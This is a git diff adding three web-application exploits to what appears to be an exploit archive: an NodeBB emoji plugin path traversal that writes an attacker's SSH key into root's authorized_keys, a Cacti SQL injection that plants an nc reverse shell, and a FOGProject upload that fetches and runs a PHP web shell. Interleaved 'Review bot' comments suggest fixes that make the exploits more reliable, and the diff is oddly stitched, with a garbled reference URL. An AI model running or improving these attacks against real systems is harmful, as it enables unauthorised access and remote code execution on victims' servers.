diff --git a/exploits/multiple/webapps/49813.py b/exploits/multiple/webapps/49813.py
new file mode 100755
index 000000000..622e5650b
--- /dev/null
+++ b/exploits/multiple/webapps/49813.py
@@ -0,0 +1,66 @@
+# Exploit Title: NodeBB Plugin Emoji 3.2.1 - Arbitrary File Write
+# Date: 2021-02-01
+# Exploit Author: 1F98D
+# Software Link: https://nodebb.org/
+# Version: Emoji for NodeBB <= v3.2.1
+# Tested on: Ubuntu 18.04 (x86)
+# Software Link: https://github.com/NodeBB/nodebb-plugin-emoji
+#
+# The Emoji for NodeBB which is installed by default contains an
+# arbitrary file write vulnerability to insecurely handled user controlled
+# input.
+#
+# This exploit requires administrative access to the NodeBB instance in order
+# to access the emoji upload API.
+#
+#!/usr/bin/python3
+import requests
+import sys
+import re
+TARGET = 'http://192.168.1.1:4567'
+USERNAME = 'admin'
+PASSWORD = 'password'
+DESTINATION_FILE = '/root/.ssh/authorized_keys'
+SOURCE_FILE = '/home/kali/.ssh/id_rsa.pub'
+headers = { 'User-Agent': 'NotPython' }
+s = requests.Session()
+r = s.get('{}/login'.format(TARGET), headers=headers)
+if r.status_code != 200:
+ print('[!] Error, {}/login unavailable'.format(TARGET))
+ sys.exit(1)
+csrf = re.search('name="_csrf" value="(.+)?" />', r.text, re.IGNORECASE)
+if csrf is None:
+ print('[!] Could not extract csrf token to proceed.')
+ sys.exit(1)
+auth = {
+ 'username': USERNAME,
+ 'password': PASSWORD,
+ '_csrf': csrf.group(1)
+}
+r = s.post('{}/login'.format(TARGET), headers=headers, data=auth)
+if r.status_code != 200:
+ print('[!] Error, login failed')
+ print('[!] Status: {}'.format(r.status_code))
+ print('[!] Response: {}'.format(r.text))
+ sys.exit(1)
+print('[+] Login successful')
+r = s.get('{}/admin/plugins/emoji'.format(TARGET), headers=headers)
+if r.status_code != 200:
+ print('[!] Error, could not access emoji plugin')
+ print('[!] Status: {}'.format(r.status_code))
+ print('[!] Response: {}'.format(r.text))
+ sys.exit(1)
+print('[+] Emoji plugin is installed')
+files = {
+ 'emojiImage': open(SOURCE_FILE)
+}
+data = {
+ 'fileName': '../../../../../../..{}'.format(DESTINATION_FILE)
+}
+r = s.post('{}/api/admin/plugins/emoji/upload'.format(TARGET), headers=headers, data=data, files=files)
+if r.status_code != 200:
+ print('[!] Error, could not upload file')
+ print('[!] Status: {}'.format(r.status_code))
+ print('[!] Response: {}'.format(r.text))
+ sys.exit(1)
+print('[+] Successfully uploaded file')
\ No newline at end of file
diff --git a/exploits/php/webapps/49810.py b/exploits/php/webapps/49810.py
new file mode 100755
index 000000000..ce76bdcce
--- /dev/null
+++ b/exploits/php/webapps/49810.py
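Review bot: The `#!/usr/bin/python3` line sits after the comment header, where it is just another comment — a shebang is only honoured on the first line of the file, so it should be moved to line 1 (the same applies to 49810.py in this commit). The handle from `open(SOURCE_FILE)` in the `files` dict is never closed; wrapping the upload in `with open(SOURCE_FILE) as fh:` and passing `fh` releases it deterministically. The `# Software Link:` header key appears twice; the second entry points at the plugin repository and would be clearer under its own label. From a defender's side, the header already states the affected range as `<= v3.2.1`, and the `../` sequences in the `fileName` field of the upload request are the indicator worth alerting on in web logs.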
@@ -0,0 +1,92 @@
+# Exploit Title: Cacti 1.2.12 - 'filter' SQL Injection / Remote Code Execution
+# Date: 04/28/2021
+# Exploit Author: Leonardo Paiva
+# Vendor Homepage: https://www.cacti.net/
+# Software Link: https://www.cacti.net/downloads/cacti-1.2.12.tar.gz
+# Version: 1.2.12
+# Tested on: Ubuntu 20.04
+# CVE : CVE-2020-14295
+# Credits: @M4yFly (https://twitter.com/M4yFly)
+# References:
+# https://github.commandcom/Cacti/cacti/issues/3622
+# https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14295
+
+#!/usr/bin/python3
+
+import argparse
+import requests
+import sys
+import urllib.parse
+from bs4 import BeautifulSoup
+
+# proxies = {'http': 'http://127.0.0.1:8080'}
+
+
+def login(url, username, password, session):
+ print("[+] Connecting to the server...")
+ get_token_request = session.get(url + "/cacti/index.php", timeout=5) #, proxies=proxies)
+
+ print("[+] Retrieving CSRF token...")
+ html_content = get_token_request.text
+ soup = BeautifulSoup(html_content, 'html.parser')
+
+ csrf_token = soup.find_all('input')[0].get('value').split(';')[0]
+
+ if csrf_token:
+ print(f"[+] Got CSRF token: {csrf_token}")
+ print("[+] Trying to log in...")
+
+ data = {
+ '__csrf_magic': csrf_token,
+ 'action': 'login',
+ 'login_username': username,
+ 'login_password': password
+ }
+
+ login_request = session.post(url + "/cacti/index.php", data=data) #, proxies=proxies)
+ if "Invalid User Name/Password Please Retype" in login_request.text:
+ print("[-] Unable to log in. Check your credentials")
+ sys.exit()
+ else:
+ print("[+] Successfully logged in!")
+ else:
+ print("[-] Unable to retrieve CSRF token!")
+ sys.exit()
+
+
+def exploit(lhost, lport, session):
+ rshell = urllib.parse.quote(f"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {lhost} {lport} >/tmp/f")
+ payload = f"')+UNION+SELECT+1,username,password,4,5,6,7+from+user_auth;update+settings+set+value='{rshell};'+where+name='path_php_binary';--+-"
+
+ exploit_request = session.get(url + f"/cacti/color.php?action=export&header=false&filter=1{payload}") #, proxies=proxies)
+
+ print("\n[+] SQL Injection:")
+ print(exploit_request.text)
+
+ try:
+ session.get(url + "/cacti/host.php?action=reindex", timeout=1) #, proxies=proxies)
+ except Exception:
+ pass
+
+ print("[+] Check your nc listener!")
+
+if __name__ == '__main__':
+ parser = argparse.ArgumentParser(description='[*] Cacti 1.2.12 - SQL Injection / Remote Code Execution')
+
+ parser.add_argument('-t', metavar='', help='target/host URL, example: http://192.168.15.58', required=True)
+ parser.add_argument('-u', metavar='', help='user to log in', required=True)
+ parser.add_argument('-p', metavar='', help="user's password", required=True)
+ parser.add_argument('--lhost', metavar='', help='your IP address', required=True)
+ parser.add_argument('--lport', metavar='', help='your listening port', required=True)
+ args = parser.parse_args()
+
+ url = args.t
+ username = args.u
+ password = args.p
+ lhost = args.lhost
+ lport = args.lport
+
+ session = requests.Session()
+
+ login(url, username, password, session)
+ exploit(lhost, lport, session)
\ No newline at end of file
diff --git a/exploits/php/webapps/49811.txt b/exploits/php/webapps/49811.txt
new file mode 100644
index 000000000..d78f8e168
--- /dev/null
+++ b/exploits/php/webapps/49811.txt
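Review bot: `exploit()` reads `url` from module scope rather than taking it as a parameter, so it only works when the script runs as `__main__` and raises `NameError` if the function is imported; the signature should be `def exploit(url, lhost, lport, session):` with the call changed to `exploit(url, lhost, lport, session)`. In `login()`, `soup.find_all('input')[0]` raises `IndexError` instead of reaching the intended "[-] Unable to retrieve CSRF token!" branch when the page has no input elements, so the result of `find_all` should be checked for emptiness before indexing. The reference line `# https://github.commandcom/Cacti/cacti/issues/3622` looks garbled — presumably the upstream issue on github.com — and since it is the vendor's tracking entry for CVE-2020-14295 it is the pointer a defender needs to locate the fixed release, so it is worth correcting. The `except Exception: pass` around the reindex request reads as a swallowed error; a one-line comment stating that the failure of that request is intentionally ignored would make the intent explicit.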
@@ -0,0 +1,31 @@
+# Exploit Title: FOGProject 1.5.9 - File Upload RCE (Authenticated)
+# Date: 2021-04-28
+# Exploit Author: sml@lacashita.com
+# Vendor Homepage: https://fogproject.org
+# Software Link: https://github.com/FOGProject/fogproject/archive/1.5.9.zip
+# Tested on: Debian 10
+
+On the Attacker Machine:
+
+1) Create an empty 10Mb file.
+dd if=/dev/zero of=myshell bs=10485760 count=1
+
+2) Add your PHP code to the end of the file created in the step 1.
+echo '' >> myshell
+
+3) Put the file "myshell" accessible through HTTP.
+$ cp myshell /var/www/html
+
+4) Encode the URL to get "myshell" file to base64 (Replacing Attacker IP).
+$ echo "http://ATTACKER_IP/myshell" | base64
+aHR0cDovLzE5Mi4xNjguMS4xMDIvbXlzaGVsbAo=
+
+5) Visit
+http://VICTIM_IP/fog/management/index.php?node=about&sub=kernel&file==&arch=arm64
+Example:
+http://192.168.1.120/fog/management/index.php?node=about&sub=kernel&file=aHR0cDovLzE5Mi4xNjguMS4xMDIvbXlzaGVsbAo=&arch=arm64
+
+6) Appears a textbox, change the Kernel Name (bzImage32) to myshell.php
+and click on Install.
+
+7) Visit http://VICTIM_IP/fog/service/ipxe/myshell.php?cmd=hostname
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index f3744a37f..e9e885dba 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -43980,3 +43980,6 @@ id,file,description,date,author,type,platform,port
 49805,exploits/php/webapps/49805.txt,"Kimai 1.14 - CSV Injection",2021-04-27,"Mohammed Aloraimi",webapps,php,
 49806,exploits/php/webapps/49806.txt,"Montiorr 1.7.6m - File Upload to XSS",2021-04-27,"Ahmad Shakla",webapps,php,
 49808,exploits/php/webapps/49808.txt,"Kirby CMS 3.5.3.1 - 'file' Cross-Site Scripting (XSS)",2021-04-28,"Sreenath Raghunathan",webapps,php,
+49810,exploits/php/webapps/49810.py,"Cacti 1.2.12 - 'filter' SQL Injection / Remote Code Execution",2021-04-29,"Leonardo Paiva",webapps,php,
+49811,exploits/php/webapps/49811.txt,"FOGProject 1.5.9 - File Upload RCE (Authenticated)",2021-04-29,sml,webapps,php,
+49813,exploits/multiple/webapps/49813.py,"NodeBB Plugin Emoji 3.2.1 - Arbitrary File Write",2021-04-29,1F98D,webapps,multiple,